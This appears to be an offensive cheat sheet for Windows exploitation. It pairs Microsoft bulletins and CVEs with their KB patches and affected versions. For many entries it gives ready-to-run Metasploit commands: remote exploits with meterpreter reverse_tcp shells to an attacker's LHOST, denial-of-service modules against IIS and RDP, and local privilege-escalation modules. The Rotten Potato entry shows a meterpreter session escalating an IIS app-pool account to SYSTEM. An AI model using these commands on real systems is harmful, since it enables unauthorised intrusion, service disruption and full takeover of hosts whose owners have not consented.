MS03-026 [KB823980]
Affected versions
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2003
- Microsoft Windows 2000SP3
- Microsoft Windows 2000SP2
- Microsoft Windows 2000SP1
- Microsoft Windows 2000
msf usage
msf > search ms03_026
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST <target ip>
msf exploit(ms03_026_dcom) > set LHOST <local ip>
msf exploit(ms03_026_dcom) > exploit
MS05-039 [KB899588]
Affected versions
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1
- Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003 for Itanium-based Systems
- Microsoft Windows Server 2003 Service Pack 1 for Itanium-based Systems
- Microsoft Windows Server 2003 x64 Edition
msf usage
use exploit/windows/smb/ms05_039_pnp
set RHOST <target ip>
set LHOST <local ip>
exploit
MS06-040 [KB921883]
Affected versions
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 SP1 for Itanium-based Systems
- Microsoft Windows Server 2003 x64 Edition
msf usage
use exploit/windows/smb/ms06_040_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit
MS08-025 [KB941693]
Affected versions
- Microsoft Windows 2000 Service Pack 4
- Windows XP Service Pack 2
- Windows 2003
MS08-066 [KB956803]
Affected versions
- windows xp
- windows 2003
MS08-067 [KB958644]
Affected versions
- windows 2000
- windows xp
- windows 2003
- windows 2008
- windows 7
msf
use exploit/windows/smb/ms08_067_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit
MS08-068 [KB957097]
Affected versions
- Windows 2000
- Windows XP
- Windows 2003
- Windows Vista
- windows 2008
msf
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
...targets...
msf exploit(smb_relay) > set TARGET <target-id>
msf exploit(smb_relay) > show options
...show and set options...
msf exploit(smb_relay) > exploit
MS09-012 (Brazilian barbecue) (pr) [KB959454]
Affected versions
- win2000
- winxp
- win2003
- winvista
- win2008
MS09-020 [KB970483]
Affected versions
- win2000
- winxp
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 SP2 for Itanium-based Systems
MS09-050 [KB975517]
Affected versions
- win2008
- win Vista
msf
msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost <target ip>
msf exploit(ms09_050_smb2_negotiate_func_index) > run
MS10-012 [KB971468]
Affected versions
- win7
- win2008
- win vista
MS10-015 [KB977165]
Affected versions
- win2003
- win2008
- win7
- winxp
msf
msf > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > show targets
...targets...
msf exploit(ms10_015_kitrap0d) > set TARGET <target-id>
msf exploit(ms10_015_kitrap0d) > show options
...show and set options...
msf exploit(ms10_015_kitrap0d) > exploit
MS10-048 [KB2160329]
Affected versions
- winxp
- win2003
- win2008
- win7
MS10-059 [KB982799]
Affected versions
- win2008
- win7
- win Vista
MS10-065 [KB2267960]
Affected versions
- IIS 5.1, 6.0, 7.0 and 7.5 (FastCGI)
msf
msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
msf auxiliary(ms10_065_ii6_asp_dos) > show actions
...actions...
msf auxiliary(ms10_065_ii6_asp_dos) > set ACTION <action-name>
msf auxiliary(ms10_065_ii6_asp_dos) > show options
...show and set options...
msf auxiliary(ms10_065_ii6_asp_dos) > run
MS10-092 [KB2305420]
Affected versions
- win2008
- win7
msf
msf > use exploit/windows/local/ms10_092_schelevator
msf exploit(ms10_092_schelevator) > show targets
...targets...
msf exploit(ms10_092_schelevator) > set TARGET <target-id>
msf exploit(ms10_092_schelevator) > show options
...show and set options...
msf exploit(ms10_092_schelevator) > exploit
MS11-011 [KB2393802]
Affected versions
- win2003
- win2008
- win7
- winxp
- winvista
MS11-046 [KB2503665]
Affected versions
- win2003
- win2008
- win7
- winxp
MS11-062 [KB2566454]
Affected versions
- win2003
- winxp
MS11-080 [KB2592799]
Affected versions
- win2003
- winxp
msf
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET <target-id>
msf exploit(ms11_080_afdjoinleaf) > show options
...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit
MS12-020 [KB2671387]
Affected versions
- win2003
- win2008
- winxp
- win7
msf
msf > search ms12_020
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST <ip>
msf auxiliary(ms12_020_maxchannelids) > run
MS12-042 [KB2972621]
Affected versions
- win2003
- win7
MS13-005 [KB2778930]
Affected versions
- win2003
- win2008
- win2012
- win7
- win8
msf
msf > use exploit/windows/local/ms13_005_hwnd_broadcast
msf exploit(ms13_005_hwnd_broadcast) > show targets
...targets...
msf exploit(ms13_005_hwnd_broadcast) > set TARGET <target-id>
msf exploit(ms13_005_hwnd_broadcast) > show options
...show and set options...
msf exploit(ms13_005_hwnd_broadcast) > exploit
MS13-046 [KB2840221]
Affected versions
- winxp
- win2003
- Windows Vista
- win2008
- win2012
- win7
- win8
MS13-053 [KB2850851]
Affected versions
- Windows Vista
- winxp
- win2003
- win2008
- win2012
- win7
- win8
msf
msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > show targets
...targets...
msf exploit(ms13_053_schlamperei) > set TARGET <target-id>
msf exploit(ms13_053_schlamperei) > show options
...show and set options...
msf exploit(ms13_053_schlamperei) > exploit
MS14-002 [KB2914368]
Affected versions
- winxp
- win2003
msf
msf > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > show targets
...targets...
msf exploit(ms_ndproxy) > set TARGET <target-id>
msf exploit(ms_ndproxy) > show options
...show and set options...
msf exploit(ms_ndproxy) > exploit
MS14-040 [KB2975684]
Affected versions
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS14-058 [KB3000061]
Affected versions
- win2003
msf
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > show targets
...targets...
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > show options
...show and set options...
msf exploit(ms14_058_track_popup_menu) > exploit
MS14-066 [KB2992611]
Affected versions
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS14-068 [KB3011780]
Affected versions
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS14-070 [KB2989935]
Affected versions
- win2003
MS15-001 [KB3023266]
Affected versions
- win7
- win8
- win8.1
MS15-010 [KB3036220]
Affected versions
- Windows Vista
- win2003
- win2008
- win2012
- win7
- win8
- win8.1
MS15-015 [KB3031432]
Affected versions
- win7
- win8
- win8.1
MS15-051 [KB3057191]
Affected versions
- win2003
- win2008
- win2012
- win7
- win8
msf
msf > use exploit/windows/local/ms15_051_client_copy_image
msf exploit(ms15_051_client_copy_image) > show targets
...targets...
msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
msf exploit(ms15_051_client_copy_image) > show options
...show and set options...
msf exploit(ms15_051_client_copy_image) > exploit
MS15-061 [KB3057839]
Affected versions
- win2003
- win2008
- win2012
- win7
- win8
MS15-076 [KB3067505]
Affected versions
- win2003
- win2008
- win2012
- win7
- win8
MS15-077 [KB3077657]
Affected versions
- win2003
- win2008
- win2012
- win7
- win8
MS15-097 [KB3089656]
Affected versions
- Windows Vista
- win2008
- win2012
- win7
- win8
- win8.1
MS16-014 [KB3134228]
Affected versions
- Windows Vista Service Pack 2
- Windows Server 2008
- Windows 7
- Windows Server 2008 R2 for x64-based Systems
- Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
MS16-016 [KB3136041]
Affected versions
- win2008
- win7
- winvista
msf
msf > use exploit/windows/local/ms16_016_webdav
MS16-032 [KB3143141]
Affected versions
- win2008
- win2012
- win7
- win8
- win10
msf
msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
...targets...
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
...show and set options...
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit
MS16-034 [KB3143145]
Affected versions
- win2008
- win2012
- win7
- win8
- win10
MS16-075 (Rotten Potato) [KB3164038]
Affected versions
- win2008
- win2012
- win7
- win8
- win10
msf
msf exploit(web_delivery) > set ExitOnSession false
msf exploit(web_delivery) > run
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
===========================================================
Enabled Process Privileges
===========================================================
SeAssignPrimaryTokenPrivilege
meterpreter > upload /root/potato.exe C:\Users\Public
meterpreter > cd C:\\Users\\Public
meterpreter > use incognito
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
meterpreter > execute -cH -f ./potato.exe
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
MS16-098 [KB3178466]
Affected versions
- win8.1
MS16-111 [KB3186973]
Affected versions
- win10 below 1703
- win8
- win2003
- win2008
- win2012
MS16-135 [KB3199135]
Affected versions
- win7
- win2008 Service Pack 1
- win8.1
- win10-1607
MS17-010 [KB4013389]
Affected versions
- win7
- win2008
- winxp
MS17-017 [KB4013081]
Affected versions
- Microsoft Windows Vista
- Microsoft Windows Server 2008
- Microsoft Windows 7
CVE-2017-0213
Affected versions
- Windows 10, including versions 1511, 1607 and 1703
- Windows 7 SP1
- Windows 8.1, RT 8.1
- Windows Server 2008 SP2, 2008 R2 SP1
- Windows Server 2012, 2012 R2
- CVE-2018-8440
- Windows Server 2016
CVE-2017-8464 [KB4024402][KB4022722]
Affected versions
- Windows 10
- Windows 7
- Windows 8.1
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2008 R2
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
msf
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set lhost <local-ip>
msf exploit(cve_2017_8464_lnk_rce) > set lport 8988
msf exploit(cve_2017_8464_lnk_rce) > run
msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <local-ip>
msf exploit(handler) > set lport 8988
msf exploit(handler) > run
CVE-2018-8120
Affected versions
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
msf
use exploit/windows/local/ms18_8120_win32k_privesc
CVE-2018-1038 [KB4088878][KB4074587][KB4056897]
Affected versions
- Windows 7 SP1
- Windows Server 2008 R2 SP1
CVE-2018-8639 [KB4100480]
Affected versions
- Windows 7
- Windows Server 2012 R2
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2019
- Windows Server 2012
- Windows 8.1
- Windows Server 2016
- Windows Server 2008 R2
- Windows 10 1607, 1703, 1709, 1803, 1809
CVE-2019-0803 [kb44934**]
Affected versions
- Microsoft Windows Server 2019
- Microsoft Windows Server 2016
- Microsoft Windows Server 2012 R2
- Microsoft Windows Server 2012
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 1803
- Microsoft Windows Server 1709
- Microsoft Windows RT 8.1
- Microsoft Windows 8.1 for x64-based Systems
- Microsoft Windows 8.1 for 32-bit Systems
- Microsoft Windows 7 for x64-based Systems SP1
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 10 Version 1809 for x64-based Systems
- Microsoft Windows 10 Version 1809 for ARM64-based Systems
- Microsoft Windows 10 Version 1809 for 32-bit Systems
- Microsoft Windows 10 Version 1803 for x64-based Systems
- Microsoft Windows 10 Version 1803 for ARM64-based Systems
- Microsoft Windows 10 Version 1803 for 32-bit Systems
- Microsoft Windows 10 Version 1709 for x64-based Systems
- Microsoft Windows 10 Version 1709 for ARM64-based Systems
- Microsoft Windows 10 Version 1709 for 32-bit Systems
- Microsoft Windows 10 Version 1703 for x64-based Systems
- Microsoft Windows 10 Version 1703 for 32-bit Systems
- Microsoft Windows 10 Version 1607 for x64-based Systems
- Microsoft Windows 10 Version 1607 for 32-bit Systems
- Microsoft Windows 10 for x64-based Systems
- Microsoft Windows 10 for 32-bit Systems
CVE-2019-1388[KB4525235][KB4525233]
Affected versions
- Microsoft Windows Server 2019
- Microsoft Windows Server 2016
- Microsoft Windows Server 2012
- Microsoft Windows Server 2008 R2
- Microsoft Windows Server 2008
- Microsoft Windows RT 8.1
- Microsoft Windows 8.1
- Microsoft Windows 7
CVE-2019-1458
Affected versions
- Microsoft Windows 10 Version 1607 for 32-bit Systems
- Microsoft Windows 10 Version 1607 for x64-based Systems
- Microsoft Windows 10 for 32-bit Systems
- Microsoft Windows 10 for x64-based Systems
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 7 for x64-based Systems SP1
- Microsoft Windows 8.1 for 32-bit Systems
- Microsoft Windows 8.1 for x64-based Systems
- Microsoft Windows RT 8.1
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2012
- Microsoft Windows Server 2012 R2
- Microsoft Windows Server 2016
CVE-2020-0796 [KB4551762]
Affected versions
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows Server, Version 1903 (Server Core installation)
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows Server, Version 1909 (Server Core installation)
CVE-2021-1732 [4601345][4601349]
Affected versions
- Windows Server, version 20H2 (Server Core installation)
- Windows 10 Version 20H2 for ARM64-based Systems
- Windows 10 Version 20H2 for 32-bit Systems
- Windows 10 Version 20H2 for x64-based Systems
- Windows Server, version 2004 (Server Core installation)
- Windows 10 Version 2004 for x64-based Systems
- Windows 10 Version 2004 for ARM64-based Systems
- Windows 10 Version 2004 for 32-bit Systems
- Windows Server, version 1909 (Server Core installation)
- Windows 10 Version 1909 for ARM64-based Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows 10 Version 1909 for 32-bit Systems
- Windows Server 2019 (Server Core installation)
- Windows Server 2019
- Windows 10 Version 1809 for ARM64-based Systems
- Windows 10 Version 1809 for x64-based Systems
- Windows 10 Version 1809 for 32-bit Systems
- Windows 10 Version 1803 for ARM64-based Systems
- Windows 10 Version 1803 for x64-based Systems
CVE-2021-33739[5003637]
Affected versions
- Windows 10
CVE-2021-40449 [5006714, 5006729, 5006739, 5006732, 5006743, 5006728, 5006736, 5006715, 5006670, 5006675, 5006667, 5006672]
Affected versions
- windows 10
Domain privilege escalation, CVE-2021-42287 [KB5008602]
Affected versions
- Windows Server 2012 R2 (Server Core installation)
- Windows Server 2012 R2
- Windows Server 2012 (Server Core installation)
- Windows Server 2012
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2016 (Server Core installation)
- Windows Server 2016
- Windows Server, version 20H2 (Server Core Installation)
- Windows Server, version 2004 (Server Core installation)
- Windows Server 2022 (Server Core installation)
- Windows Server 2022
- Windows Server 2019 (Server Core installation)
Domain privilege escalation, CVE-2021-42278 [KB5008380]
Affected versions
- Windows Server 2012 R2 (Server Core installation)
- Windows Server 2012 R2
- Windows Server 2012 (Server Core installation)
- Windows Server 2012
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2016 (Server Core installation)
- Windows Server 2016
- Windows Server, version 20H2 (Server Core Installation)
- Windows Server, version 2004 (Server Core installation)
- Windows Server 2022 (Server Core installation)
- Windows Server 2022
- Windows Server 2019 (Server Core installation)
CVE-2022-21882[5009566,5009543,5009545]
Affected versions
- Windows 10 Version 1809/1909/2004/20H2/21H1/21H2 for 32/64-bit Systems
- Windows Server, version 20H2 (Server Core Installation)
- Windows 11 for ARM64/x64-based Systems
- Windows Server 2019/2022